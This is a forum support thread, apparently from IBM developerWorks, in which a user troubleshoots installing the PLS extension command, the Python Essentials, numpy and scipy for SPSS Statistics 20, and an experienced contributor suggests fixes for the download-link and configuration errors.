90.26
Hi there, I have read through the numerous feeds for downloading PLS add-ons and the Python extension modules - however I am stumped quite early on. When I click on the Statistical Tools link under the "Downloads for IBM SPSS Statistics" section of the ibm, developer works page, I am directed to the My Files page without any links for download. Can anyone help me out here? Is there an alternative route for downloading the PLS extension? Thanks in advance! M Answer by JonPeck (4671) | May 06, 2013 at 09:39 PM If I click on the link I think you are referring to (), I see a list of 52 downloadable items, including the PLS package. If for some reason you can't get that view, you can use the Extension Commands collection link on that same page. You can sort the list alphabetically by clicking the small "Name" control at the top of the list. HTH Answer by mtvinski (0) | May 07, 2013 at 03:15 PM Hi Jon, Thank you for the link - it works with the direct link you've provided here, but does not work on the main page. I think there is an error (as it is mentioned on the main page by multiple members). As a result, I am also unable to download the Supplementry tools needed to successfully run a PLS analysis for python. I've searched the error (Error #1) in the previous feeds and you've mentioned that the error is because the proper .py files have not been downloaded. You guided the individual to the "supplementry" downloads - but again, this link from the main download page sends me to "My Files". Would you happen to know these files, so that I can locate them on the general download page you provided in the previous post? Thanks in advance, Jon. You have been a great help to so many people! M Answer by JonPeck (4671) | May 07, 2013 at 03:37 PM Would you clarrify? I can't see any page errors. If you need the PLS extension command itself, it is here. Answer by mtvinski (0) | May 07, 2013 at 06:59 PM I have already downloaded that file from the previous link that you provide, but thank you for offering it again :) I have downloaded the PLS.zip, the numPY and the sciPY files - but for some reason I am still receiving the following error: Error # 6890. Command name: BEGIN PROGRAM Configuration file spssdxcfg.ini is invalid. Execution of this command stops. Configration file spssdxcfg.ini is invalid because the LIB_NAME is NULL. Based on the forum that you've extensively covered already - I see that this can be a common error. I am pretty sure the problem stems from not having downloaded he Plug-Ins - - because I am unable to access the link from the homepage. When I click on "The Essentials and Plugins for IBM SPSS Statistics Version 20 for Python and .NET are available here. They have been updated to version 20.0.0.2 but are compatible with 20.0.0.0. NOTE: if you have the 20.0.0.0 or 20.0.0.1 version of the Essentials installed, you must uninstall it before installing this update." - I am directed to the My Files page, which is empty. Would you mind providing the link, so that I am able to download the plug in? Hopefully this works. Thanks again! M Answer by JonPeck (4671) | May 07, 2013 at 07:51 PM the developerWorks team has reported that this is a variation on a problem they have found with different browsers. It appears that firefox works, but IE is mangling the url. You can go directly to this link to get the V20 plugin/Essentials, but you might have to switch browsers. Answer by mtvinski (0) | May 08, 2013 at 02:56 PM Good morning Jon, Yes, I received the same feedback from IBM directly. I uninstalled all of the programs (except SPSS) and re-installed everything using google chrome. However, I am still seeing the following error when I try to run a PLS: >Error # 6890. Command name: BEGIN PROGRAM >Configuration file spssdxcfg.ini is invalid. >Execution of this command stops. Configration file spssdxcfg.ini is invalid because the LIB_NAME is NULL. I have download the essentials, downloaded the PLS.zip, the spiPY and the numPY folders. I have places all three of those files into the extensions folder of SPSS, as well as in the Python folder. Am I missing something? Should the python folder be directly linked to the SPSS folders? One thing that I noticed was that when i tried the "import spss, PLS" command into the Python command line (as you've suggested on other feeds) - i received the error File "C:\Program Files\IBM\SPSS\Statistics\20\extensions\PLS.py.", line 53, in <module> from and try again. Be sure to get the version matching your python version." Is there a simple step by step for how to get PLS to work using SPSS - including where the downloaded files go...what should go where... I have seen your document on putting spiPY and numPY in the extension folder - but I dont think this is enough guidance. This is an incredibly arduous experience! Thank you in advance for all of your help. M Answer by JonPeck (4671) | May 09, 2013 at 11:07 PM You can't just download these files. You need to run the installer for the Python Essentials. It will take care of putting the infrastructure pieces in the right place. The next step is to download the PLS.zip file and follow the installation instructions in it. Finally, you need to get the numpy and scipy installables and run their install. It is true that this is more complicated than would be ideal, but once you have the Python Essentials working, you will have a lot of other commands that use the Essentials available. Thousands of people have gotten PLS working, so you can do it too with a little care. Answer by mtvinski (0) | May 13, 2013 at 07:24 PM Hi Jon, I have taken great care to get this installation process to work. These files were not just downloaded, they were installed as well (with the exception of numpy - there was no installation procedure with this file. If I am wrong in this, then please direct me toward the installation link within the numpy folder that is available for download) Alas, I went through and deleted all files and stated again, using your instructions above. There must be an error in where the folders are being placed. the PLS.zip, numPY and spiPY have been placed in the extensions folder of the SPSS folder. Yet when I run a PLS analysis, the output still has the following error: >Error # 5712 in column 8. Text: spss >A valid IMPORT subcommand name is expected but not found. Recognized >subcommands are FILE, TYPE, KEEP, DROP, RENAME, and MAP. >Execution of this command stops. PLS q2a MLEVEL=S WITH q1g q1h q1i q1j q1k /CRITERIA LATENTFACTORS=5. Extension command PLS could not be loaded. The module or a module that it requires may be missing, or there may be syntax errors in it. Do you have any thoughts as to why this analysis is still not working? Does the essentials folder have to be within the extensions folder as well? Does the Python folder have to be within the extensions folder? Thanks again for your time. I appreciate all of your help. M Answer by JonPeck (4671) | May 13, 2013 at 07:55 PM There is a superpack that includes both numpy and scipy, at least for certain versions, for example numpy-1.6.1-win32-superpack-python2.7.exe scipy-0.9.0-win32-superpack-python2.7.exe This must be executed in order to install these. You can check the installation by running this in a syntax window begin program. import numpy import scipy end program. This message, however, Error # 5712 in column 8. Text: spss >A valid IMPORT subcommand name is expected but not found. Recognized >subcommands are FILE, TYPE, KEEP, DROP, RENAME, and MAP. >Execution of this command stops. indicates that SPSS has not even shifted into Python mode. It is a complaint about the SPSS IMPORT command, which should not appear. The second error, Extension command PLS could not be loaded. is likely to be a problem with numpy and/or scipy. You may get additional diagnostic information by running this program. begin program. import PLS print PLS end program. 46 people are following this question.
https://developer.ibm.com/answers/questions/218380/ineffective-statistical-tools-link-for-downloads-f.html
CC-MAIN-2019-39
refinedweb
1,445
74.79
Yo Barry, xfsprogs/doc/CHANGES - Rename include/list.h to xfs_list.h so that other applications do not accidentally use it. What was the problem here? This doesnt sound like the right fix - there should be no applications outside of the XFS userspace that use libxfs.h - thats what <xfs/xfs.h> is for (exactly this reason, preventing namespace collision, by reducing all the XFS internals being exposed). Also, there seems to be lots of checkin mail not making it out to oss.sgi.com (let alone review mail), making it difficult for people to keep up to date with changes (and keep distros, like Debian, uptodate) ... could y'all make some effort to keep us "on the outside" in the loop? Oh, noone is updating oss.sgi.com/projects/xfs/{news,index}.html with recent changes either - seems like progress has come to a halt to those of us no longer in the secret cabal, anyway ;) ... just FYI. cheers. -- Nathan
http://oss.sgi.com/archives/xfs/2006-12/msg00239.html
crawl-002
refinedweb
161
67.86
E-Puck Contents - 1 Hardware - 2 Software - 2.1 Getting started - 2.2 Library - 2.3 Standard firmware - 2.4 Programming - 2.5 PC interface - 2.6 Connecting to multiple robots - 2.7 Examples - 2.8 Bootloader - 2.9 Others tools - 3 ROS - 4 Test and Results - 5 Known problems - 5.1 Re-flashing the bootloader on e-puck - 5.2 Uncorrect/unknown bluetooth PIN code - 5.3 Battery isolation (for battery up to 2012) - 5.4 Bluetooth and MacBook - 5.5 Memory protection - 5.6 Proximity noise - 5.7 ICD2 programmer - 5.8 Upload failed - 5.9 Speed precision at very low speed - 5.10 Mail archive - 5.11 Bluetooth slowdown in Ubuntu - 6 Links - 7 Videos Hardware: The updated e-puck library handles automatically the various hardware revisions in order to be compatible with the existing standard software.: #include <DataEEPROM.h> /*read HW version from the eeprom (last word)*/ int HWversion=0xFFFF; int temp = 0; temp = ReadEE(0x7F,0xFFFE,&HWversion, 1); This project (src) is an example on how to write the last word of the EEPROM. left, the y axis points forward and z points upward: For users playing with e-puck HWRev1.3 and gumstix extension refer to section Accelerometer and gyroscope (e-puck_HWRev_1.3). Microphone From HWRev 1.3 the microphone sensitivity resulted a little bit different from the previous hardware revision; some empirical tests show that the difference is about ±15% so beware to adapt the thresholds in your applications if you Serial communication The communication between the robot and the computer can be also handled with a serial cable; the serial connector position on the robot, the related cable and the electric schema are shown on the following figures. In order to communicate with the robot through a serial line, the robot firmware must be implemented using the functions of the UART2 instead the one of UART1 (BT). All the functions implemented for the UART1 are also available for the UART2, so it's only a matter of changing the function call names. Anyway the standard firmware contains already a mode that communicates over serial line selecting position 11; in this mode you can configure the BT. I2C communication The camera, the ground sensors extension, the accelerometer (e-puck HWRev 1.3 only) and the gyro (e-puck HWRev 1.3 only) are connected to the I2C bus as slave devices (the microcontroller is the master). The y command of the Advanced sercom protocol. can be used to read the registers values of these sensors. For instance you can read the camera id with the following commands: y,220,0 and y,220,1 that return respectively 128=0x80 and 48=0x30 (id=8030). In the same way you can read any register with the general command y,220,REG_ADDR. For the accelerometer you must use 60 as device address ( y,60,REG_ADDR) and for the gyro you must use 212 ( y,212,REG_ADDR). The device address value to be used with the y is obtained by shifting by one position left the I2C 7-bit address of the device, for example the camera 7-bit address is 0x6E, by shifting one position left we get 0xDC=220. Batteries! This battery doesn't fit perfectly in older chargers, but it can be inserted anyway in the charger in order to make a good contact and charge it; when the contact is ok you will see the led turned. Charger circuit diagram The circuit diagram of the e-puck charger is available on the following link charger-circuit-diagram.png. Software for Linux or teraterm for Windows) Library The embedded software running on the e-puck is continuously extended and managed in the following git repo. The repo comprises a complete library to work with all the sensors mounted on the e-puck and is the basis for many demos. You can download the library documentation form the following link e-puck-library.pdf. The content of the repo is the following: - library: this is the low level library of the e-puck - program: - "Bluetooth mirror": interact with the Bluetooth chip through serial cable - "BTCom": basically it is the "asercom" implementation, refer to Advanced sercom protocol - EPFL demo project: some nice demos bundled in one project, such as sound source location, obstacle avoidance and color blob detection (red and green). Some of these demos are included in the GCtronic standard firmware. - GCtronic standard firmware project, refer to section Standard firmware - tool: - computer-side and e-puck side bootloader - matlab interface/monitor for e-puck - C++ interface/monitor for e-puck In order to download a snapshot of the repo, go to the page and then click on the green botton named Clone or download and select Download ZIP as shonw in the following figure. Structure As previously mentioned the git repository includes a library to which many demos are linked. Only updates to this library that will be useful to others people and/or correct errors should be commited; some demos of this wiki makes changes to the library for the solely purpose of running the demo and thus they aren't commited to the repo. In order to separate the original e-puck library from what is modified in the library for the current demo, all the projects (created with MPLAB) share the same structure, that is they have to be placed within the program folder of the repository and must contain only the files of the library (and their dependencies) that have been modified. An example of this structure is shown afterwards: - e-puck-library - inlcuded. Standard firmware The robot is initially programmed with a firmware that includes many demos that could be started based on the selector position: -. The pre-built fimrware is available from DemoGCtronic-complete.hex. You can have a look at the source code from the following link; beware that the project is actually included in the e-puck library repository, refer to section Library to download it. Project building In order to build the project you need to install the MPLAB X IDE and related compiler, refer to section Programming: MPLAB X. The standard firmware project is based on the e-puck library (refer to Library section). To build the project follow these steps: 1) download and extract the e-puck library repository (refer to section Library), let say in the folder e-puck-library; you should have the following situation: - e-puck-library - library - program - ... - DemoGCtronic-complete - tool 2) Open MPLAB X, then click File=>Open Project and select the project file demoGCtronic.X you can find in e-puck-library\program\DemoGCtronic-complete. If you're asked to upgrade the project to the current IDE version, click yes to confirm. 3) Right click on the project name (on the left panel) and select Properties as shown in the following figure: 4) Select the XC16 compiler from the Compiler Toolchain section and then click OK as shown in the following figure: 5) Open the project properties once more (right click on project name and then select Properites), a new configuration will be available for the XC16 compiler. On the left panel select xc16-gcc, then on the right specify Memory model and verify that the Code model is set to Large. Confirm with OK as shown in the following figure: 6) Now you can build the project by clicking on the Build project button (hammer icon on the top) or by pressing F11; if all is working you should end up with a successfully built firmware as shown in the following figure: Programming MPLAB X If you are interested in development of embedded applications, you should firstly choose an adequate development environment. One of the most known IDE is the MPLAB Integrated Development Environment that you could download for free from the Microchip site; Microchip offers also the C compiler for free. One big advantage of this IDE is that it is multiplatform (Windows, Linux, Mac) and also the compiler is available for each platform. To work with the e-puck software you need to: - download and install the MPLAB X IDE; during installation select also MPLAB IPEto be installed, it is a nice utility to have - download and install the compiler, it must be the MPLAB XC16(supports all 16-bit PIC MCUs and dsPICs) Useful information related to the compiler can be found in the MPLAB XC16 C compiler user's guide. Aseba Aseba is a set of tools which allow novices to program robots easily and efficiently, refere "e-puck-library mac_address is the address that you previously annotate (e.g. 10:00:e8:c5:61:c9). Connecting to multiple robots A Python example is available for e-puck2 in the following section PC side development: Connecting to multiple robots. This example is compatible also with the e-puck1 robot. Examples). Still images This demo program is optimized to let the robot handle images with resolution up to 640x. Bootloader - Windows: Tiny Bootloader v1.10.6 or Tiny Multi Bootloader+ - Linux: epuck-bootloader-linux.zip - requirements: sudo apt-get install libbluetooth-dev - Mac OS: - actually it is a Perl script, thus in principle it could be used also in Linux and Windows - after pairing with the robot, you should issuing a command similar to ./epuckupload -f firmware.hex /dev/tty.e-puck_3675-COM1and then press the reset button on the robot Others tools From the official e-puck site you can find information about others software tools available for the e-puck robot in the following link. Local communication An example of such tools is the libIrcom, a local communication library exploiting the proximity sensors placed around the robot to modulate infrareds. If an higher throughput and longer communication distance are required, there is the range and bearing extension designed for this purpose.. epuck epuck driver for python, we developed another ROS node based on roscpp that has the same functionalities; the code (together with the VirtualBox Extension Pack) Webots The Webots simulator integrates a ROS controller that publishes the sensor data of the e-puck robot in ROS, then we can exploit the multitude of packages available in ROS to process the sensors data and simulate the behavior of the e-puck by issueing E-puck gumstix extension For more information on how to use ROS with the e-puck gumstix extension refer to section. Test and Results (master=selector position 9, slave=selector position 4).. The slave robot is intended to be programmed with the standard firmware (selector position 3).. There are various modes available on this demo, depending on the selector position: - 0: search for an e-puck1 or e-puck2 and connect to the first one found, then send some commands to it through the advanced sercom protocol - 1: receiver mode (template) - 2: connect directly to an e-puck1 (no search is accomplished) and then send some commands to it - 3: connect directly to an e-puck2 (no search is accomplished) and then send some commands to it e-puck balancing The users can transform the e-puck in a self balancing robot by applying some mechanical modifications as shown in the following figure. Here are the 3d models of the wheel tyre extension and spacer. For more information on the assembly please contact us. Click to enlarge Here is a video of the e-puck trying to self balance; this is only a starting point to demonstrate the feasiblity, so you can take the code (MPLAB X project) and improve it. e-puck and Arduino The Arduino boards are used widely in the hobby community and you can extend the functionalities of a board by using the so called shields; there are tons of shields like WiFi, SD reader/writer, battery, XBee, GSM, speech recognition, rfid, ... there is a shield for everything (almost).). A test project that works without any shield is available in the following link Arduino IDE (1.6.6) test project, this demo rotates continuously the robot right and left. It works with the same robot firmware as the previous demo." from the shop. Known problems Re-flashing the bootloader on e-puck In some cases it was reported that the internal bootloader on e-puck was corrupted due to a malfunction of the last code upload. In those cases the bootloader (DemoGCtronic-complete-4bba145+bootloader.hex) has to be re-flashed on the robot via cable (see figure) with ICD2 or ICD3 and MPLAB IDE or compatible HW and SW. See the procedure (Instruction re-program bootloader.pdf) and in case of need contact info[at]gctronic.com. Uncorrect insipiration. You can get the serial cable from the shop. "memory protection" still blocks and. ICD2 programmer The Microchip ICD2 programmer P/N 10-00319 isn't supported on 64-bit OS.. Speed precision at very low speed The e-puck motors are step motors. To save energy, the motor phases/steps at low speed are not energized all the time but just partially. This might affect the speed precision at speed below 200. If one has specific needs at that low speed and want the single steps to be more energetic, then the TRESHV and MAXV constants in the file \motor_led\advance_one_timer\e_motors.c within the e-puck library need to be adapted (decrease their value). Alternatively the power save feature can be completely disabled by commenting the POWERSAVE constant. Mail archive You can have a look at a mail archive (February 2007 - December 2016) regarding the e-puck robot from the following link. In this archive you can find problems encountered by users and related solutions. Bluetooth slowdown in Ubuntu If you experience a slowdown using the Bluetooth in Ubuntu try removing the package modemmanager with the following command: sudo apt-get remove modemmanager Links
https://www.gctronic.com/doc/index.php?title=E-Puck&amp%3Bdirection=prev&amp%3Boldid=1266&printable=yes
CC-MAIN-2019-35
refinedweb
2,302
51.07
#include <deal.II/base/function_lib.h> Given a wavenumber vector generate a sine function. The wavenumber coefficient is given as a \(d\)-dimensional point \(k\) in Fourier space, and the function is then recovered as \(f(x) = \sin(\sum_i k_i x_i) = Im(\exp(i k.x))\). The class has its name from the fact that it resembles one component of a Fourier sine decomposition. Definition at line 682 of file function_lib.h. Constructor. Take the Fourier coefficients in each space direction as argument. Definition at line 1878 of file function_lib 1888 of file function_lib.cc. Return the gradient of the specified component of the function at the given point. Reimplemented from Function< dim >. Definition at line 1900 of file function_lib.cc. Compute the Laplacian of a given component at point p. Reimplemented from Function< dim >. Definition at line 1912 of file function_lib.cc. Stored Fourier coefficients. Definition at line 716 of file function_lib.h.
http://www.dealii.org/developer/doxygen/deal.II/classFunctions_1_1FourierSineFunction.html
CC-MAIN-2017-43
refinedweb
154
52.97
Hi, I’ve a long code for irrigation system working on Arduino uno. I’m using RTC DS1307 module, however it skips more than 1 minute every day so I purhased ESP8266 module to periodically update time. As I’m using Time.h library together with TimeAlarms library, and I see that there is setSyncProvider(getTimeFunction) command to synchronize time periodically. I’ve separately test ESP8266 and successfully get NPT data to ESP8266. But it works based on the delay inside the loop of ESP8266 code. So for now it gets NPT data every second. I can send this code via Serial port, listen it from Arduino periodically, update Arduino/RTC time when a data is received from Serial port. However it does not make much sense, because I want to update time data once a day, so listening the same port all the time for a code that will be received only once a day feels like too much. So I guess it would be better if Arduino request NPT time from ESP8266 and ESP turns back with the new value only when it is asked. How it would be possible? Any sample code for Arduino and ESP8266 I should use? Below is the code I’ve tested with ESP8266 that gets NPT time every second. #include <NTPClient.h> #include <ESP8266WiFi.h> #include <WiFiUdp.h> const char *ssid = "Wifi Name"; const char *password = "Password"; const long utcOffsetInSeconds = 14400; //Dubai time zone is GMT+4 = 4*60*60 = 14400seconds difference char daysOfTheWeek[7][12] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"}; String formattedDate; String dayStamp; String timeStamp; //(); formattedDate = timeClient.getFormattedDate(); Serial.println(formattedDate); //Return will be like 2019-09-01T23:56:36Z delay(1000); }
https://forum.arduino.cc/t/what-is-the-best-way-to-get-npt-data-to-arduino-using-esp8266/609181
CC-MAIN-2022-40
refinedweb
284
55.95
From: Joaquin M Lopez Munoz (joaquin_at_[hidden]) Date: 2004-03-30 16:12:19 Pavol Droba <droba <at> topmail.sk> writes: > > > > > NAMESPACE > > * Proposal: boost::container::multi_index [...] > I have just one remark about the namespace usage. IMHO it is an overkill to > provide a special namespace for every container. > I think, that putting this all containers into boost::container namespace > is verbose enough. > > There has been very similar discussion about the algorithm namespace > (namely the string algorithm library). Current situation is that everything > resides in boost::algorithm namespace and interface names are lifted to boost > namespace. This model has been settled as a reasonable compromise. > > It is worth to mention, that there are generaty more free stading names in algorithm > libraries than in the container ones. So if the name-clashing problem is not here, > I don't see it in container case. > [...] I think indexed_set (or composite_container) cannot live without a namespace ot its own. There are many utility classes around the container with names like (to pick a few) * tag * index * member * identity These are *public* classes. Would you choose to have them in boost::container? JoaquÃn M López Muñoz Telefónica, Investigación y Desarrollo Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2004/03/63357.php
CC-MAIN-2021-31
refinedweb
218
59.7
It is working correctly but I want to use this functionality in Java instead of Php, So please help me how can i use this??? How to convert Datasource of a Combobox to Datatable in VB.net? I know how to assign datatable to combobox. In this case I need to do it opposite way. Like: dim dt as DataTable = combobox1.DataSource Is this possible? --------------Solutions--------- main DataTable called dt and two other DataTables called successBatch and failBatch. The latter two are created as Clones of the main one. I would like to remove all the DataRows that are inside successBatch and failBatch from dt. This used This question already has an answer here: When should I load the collection from database for h:dataTable 1 answer I'm trying to render a list of products in a .xhtml page, from my database in Postgres: i'm using the JSF tag h:dataTable. Unfortunatel I want to get the unmatched records by comparing two DataTables eg : Table 1 TransID BookingID BookingStatus BookingType 1 11 Y Paid 2 12 N UnPaid 3 13 N Paid Table 1 TransID BookingID BookingStatus BookingType 1 11 Y Paid 2 12 Y UnPaid 4 14 Y Paid I I need to make a validation in datatables array. if typeoftransfer === '2' then return 'LL' elseif typeoftransfer === '3' return 'SA' I have been reading datatables documentation and didn'f found how to do it. Here is my array code on the server proc have following code: DataTable datTable3 = new DataTable(); datTable3 = datTable1.Clone(); datTable2.Merge(datTable1); datTable3 = datTable2.GetChanges(); Want I want to do is: Compare DataTable1 with DataTable2 and when there are rows in DataTable I had implement editable p:datatable. After I click on the edit button and change the value, the Edit and Cancel button is not working, and the row just keep open to edit. May I know any mistake I am facing? The code is <p:panel> <p:messages id=& I'm writing a client-server application. I want to send DataTable table where most of columns are of type Pair. I have that public class Pair inside public class Struct on both Server and Client. [Serializable] public class Struct { public class Pair I am using datatables in my project and it is simply amazing. Kudos! I have faced an issue which I haven't found satisfactorily answered anywhere in my quick search. I am using server side option to filter and search the data. This is my query, which I am looking for the cleanest way availble to convert a List into a datatable. I came across some articles which was basically combination of Foreach +Reflection. Not a bad option IF there is no other cleaner way to do it. After some research I came I have one DataTable Datatable dt; There are 10 columns there, including the ID of the row. And in the view state I have a generic list like: List<MyObject>; Myobject has some fields including the same ID. The datatable has ALL items, and the l I have a datatable with data and filter The filter works perfecly, when I white some that doenst exists, the datable is empty, but when I reload the page the data doenest show in the datatable This is my code XHTML <p:tab title="#{caseList['caseMa I am trying to use a jquery datatable using ajax sourced data in my application. My table html would be <table id="dynaFormVersionTable" class="table table-striped table-hover dt-responsive" cellspacing="0" width="100%"> <thead> <tr How would I split up a DataTable that has dynamic column count and names Ideally I'd like a method signature like List<DataTable> SplitColumnOnColumn(DataTable table, int count) | columnFirst | columnSecond | columnThird | columnFourth | column var itemAmountList = _itemAmountvalue.Split(','); var listItemDescriptionValues = _itemDescriptionvalue.Split(','); IEnumerator enum1 = itemAmountList.GetEnumerator(); IEnumerator enum2 = listItemDescriptionValues.GetEnumerator(); DataTable dtCustomI I'm displaying data from database in JQuery data tables.i want to display latest inserted record in top. My SQL query is working fine,but however JQuery data tables sorting is not happening.....so i want to sort data DESC order for data tables. Where I am trying to add column to datatable whose value is derived from some mathematical computations on other columns. I am doing as below: dt.Columns.Add("OpeningBalance", GetType(Decimal), "Amt01-" + "Amt02-amt03") What I need is to subtract amt03 to
http://www.dskims.com/tag/datatable/
CC-MAIN-2019-13
refinedweb
732
62.88
Stand-alone C++ code for log(1+x) If p is very small, directly computing log(1+p) can be inaccurate. Numerical libraries often include a function log1p to compute this function. The need for such a function is easiest to see when p is extremely small. If p is small enough, 1 + p = 1 in machine arithmetic and so log(1+p) returns log(1) which equals zero. All precision is lost. If p is small but not so extremely small, direct computation still loses precision, just not as much. We can avoid the loss of precision by using a Taylor series to evaluate log(1 + p). For small p, log(1+p) ≈ p - p2/2 with an error roughly equal to p3/3. So if |p| is less than 10-4, the error in approximating log(1+p) by p - p2/2 is less than 10-12. So we could implement the function LogOnePlusX as follows. The following code first appeared in A literate program to compute the inverse of the normal CDF. #include <cmath> #include <sstream> #include <iostream> #include <stdexcept> // compute log(1+x) without losing precision for small values of x double LogOnePlusX(double x) { if (x <= -1.0) { std::stringstream os; os << "Invalid input argument (" << x << "); must be greater than -1.0"; throw std::invalid_argument( os.str() ); } if (fabs(x) > 1e-4) { // x is large enough that the obvious evaluation is OK return log(1.0 + x); } // Use Taylor approx. log(1 + x) = x - x^2/2 with error roughly x^3/3 // Since |x| < 10^-4, |x|^3 < 10^-12, relative error less than 10^-8 return (-0.5*x + 1.0)*x; } This code is in the public domain. Do whatever you want to with it, no strings attached. Other versions of the same code: Python, C# Stand-alone numerical code
http://www.johndcook.com/cpp_log_one_plus_x.html
CC-MAIN-2014-35
refinedweb
308
75
Like most programming languages, C was developed out of dissatisfaction with existing programming languages. Back in 1969 – when the idea of developing an operating system using a higher-level programming language was still novel – Dennis Ritche was beginning to realise the shortcomings of the B programming language as he was working on recoding the Unix operating system to a new architecture in a higher-level language. B was designed for a different computer generation – by Ken Thomson, who also contributed to C. The language was word-addressed instead of byte-addressed, and lacked floating point support. Since the early colonists of the digital era were not spoilt for choice as we are these days, they decided to create a programming language which better suited their needs. Thus C was in use as early as 1972-1973, however this was the C before any serious efforts in standardisation were made, and would look odd to today’s C developers. It was only with the publication of the ‘The C Programming language’ by Brian Kernighan and Dennis Ritche in 1989 that C finally got a widely available manual for its syntax. The first ‘official’ C standard that was ratified by the ANSI was published in 1989, and is still available in popular C compilers such as the GCC C compiler. This edition of the language is so popular that it is still the default syntax of the current (4.9) version of GCC. It is commonly referred to as C89 or C90. Since then C has had two major revisions, once in 1999 (known as C99), and again in 2011 (known as C11). The upcoming 5.0 release of GCC will finally adopt the latest C11 edition of C as the default. Given how old it is, it is a testament to the design of the language, and the skill of its designers, that it is relevant to this day. Dennis Ritche (standing) and Ken Thomson working on the first computer for which they designed C (The PDP-11). Significance It is hard to overstate the significance of C in the landscape of computing today. Nearly every popular programming language used today, whether it be JavaScript, Java, C#, PHP, Objective-C, or even Python is inspired by conventions set by C. Compared to languages it inspired though, C is significantly low-level. C improves the readability, maintainability and ease-of-development of code significantly compared to Assembly, and is significantly more portable despite giving developers nearly as much power as Assembly does. C gives developers low-level access to machine hardware, with minimal abstraction and pointers in C let the developer directly work with raw memory locations. As you can imagine, this makes it the perfect candidate for system programming. Few other languages are as suitable, or as highly used in writing low-level code such as operating system kernels or device drivers. One only needs to look at the three major operating system families to see proof of that. The Linux kernel, the OSX kernel (Mach / Darwin) and the Windows (NT) kernel are all mostly written in C, with some Assembly thrown in. In fact when one encounters a kernel not written in C, it is often a point to highlight. Another field where C has a significant market share is in programming embedded systems. Low-level systems such as the ones that control various systems in cars, from ABS to managing fuel / air mixtures etc. Since these systems are mission critical, and you wouldn’t want a blue screen of literal death, the version of C used in such systems is often a restricted one. After all, you can’t really patch you car to car 1.0.1 if they detect a bug later on! It is also an incredible point in its favour that C is the language in which the interpreters of popular languages such as Python, PHP, Ruby and Lua are written. The deeper you go into computer programming, the more likely it is that you will find copious amounts of C. Nearly every electronic device you touch, that has some kind of embedded microcontroller or microprocessor in all likelihood runs at least some code that was once stored in a .c file. Whether its a hobby project or mission critical code running on an embedded device, chances are it was written in C. Hello World #include <stdio.h> int main(void) { printf (“Hello, world !\n”); return 0; } Hello World is possibly one of the simplest programs you can write in any language, and C is possibly one of the more verbose ones. If you just want something that compiles – with warnings – and throws “Hello, world!” to the screen though, you can even get away with just the following (with some compilers): main() { printf(“Hello, world!\n”); } Sort void insertion_sort(int *arr, const size_t arr_len) { for (size_t i = 1; i < arr_len; i++) { int elem = arr[i]; size_t j = i; for (; j > 0 && elem < arr[j - 1]; j--) { arr[j] = arr[j - 1]; } arr[j] = elem ; } } Insertion sort in C isn’t exactly complex. Here in the above example we are the newer syntax which allows us to define variable as they are used rather than in the beginning of the function. This has been supported since C99. Tools and Learning Resources The age of C has another significant advantage, there is a plethora of tutorials, books, videos, and the like available for C, and many of them are absolutely free. There are also dozens of compilers and IDEs available for C, most free if not open source. However, of greatest important —for desktop OSs at least— are Microsoft’s Visual C++ compiler, the GNU Compiler Collection (GCC), and the newer Clang. Clang aims to be a drop-in replacement for GCC, and features a similar interface. It is gaining popularity, and is now preferred by a number of BSDs and Apple —which is unsurprising since they are one of its primary developers. If you are using Windows, you have a couple of options. Firstly Microsoft’s C / C++ compiler ships with the Windows SDK and with their Visual Studio IDE. The SDK is free, and a free version of the Visual Studio IDE is available, and has recently expanded its feature-set quite a bit. If you intend to develop purely for Windows, wish to use Windows-specific features, or wish to write extensions for parts of Windows itself, you will need this. Even otherwise, the hallmarks of a well-developed piece of software is its ability to compile under multiple different compilers by different vendors. Microsoft’s new Visual Studio Community edition brings the free version of the IDE closer to the paid offering. On OSX the development tools are available with the SDK, and can be installed from the OSX DVD, or downloaded via the Mac App Store. This includes the XCode IDE. If you are using Linux, chances are development tools and basic libraries for C are already installed, if not it can definitely be found in your distro’s repositories and is just a command or two away. Also, if you’re using Linux you should probably know how to take it from here! Another good IDE for C and C++ is QtCretor by Digia. It is part of the Qt project, but doesn’t require you to use Qt itself. Best of all, it is free, open source, and cross-platform. XCode is Apple’s free IDE for building OSX and iOS apps. If you are using Linux / OSX, C documentation is basically built into your operating system! The documentation for any function is just a single command away. Linux (and Unix and OSX) include the ‘man’ or manual command that can be invoked in the command line to open documentation on any topics. Many people are familiar with the command for looking at the usage instructions for command line programs, but it works equally well for C functions! Try it, if you are running a *nix OS, type ‘man printf’ and find a instant usage guide to that function in C. Most C libraries you install will also install a documentation package, so this should work for any development library you have installed. QtCreator has great debugger integration as well as support for targeting Android. The manual that come with most Linux software are an invaluable resource of knowledge. If you are using Windows, or otherwise would prefer to view this information in a GUI, you can just try searching for ‘man <function>’ in your favourite search engine, and you will likely find one of the many online man-page repositories. This will be less useful for Windows users though. If you’re already reaching for your browser though, there is no end to good learning resources for C. Simply a search will reveal great starting resources, so rather than reiterate those here we will share a three resources that teach something interesting. Create your own Kernel Module: If you ever wanted to get into really low-level programming, building your own driver for the Linux kernel, here is a guide that will help you. Instead of jumping into the deep end, this tutorial showcases a very simple kernel module that simply creates a /dev/reverse device in Linux that will reverse the word order of strings sent to it. Where you take it from there is up to you. Believe it or not, someone actually has to code the bits of software that actually allocate, deallocate and keep track of the memory used by variables you use in your programs. Since creating and destroying variables happens a LOT in any software, speeding up this process can have a large impact on software performance, especially if the way you use variables is special, for instance if you are developing a game. This article and this one will give an overview of this bit of software. Add a new feature to Python by modifying its code: If you’ve ever wondered how the features of a programming language map to actual code in its compiler or interpreter, this article is what you are looking for. It’s written by a core Python contributor, and takes you through adding a new statement to the Python syntax by modifying its C code. For tutorials on 15 other hot programming languages go here.
https://www.digit.in/software/learn-c-tutorial-c-basics-28481.html
CC-MAIN-2018-43
refinedweb
1,729
59.43
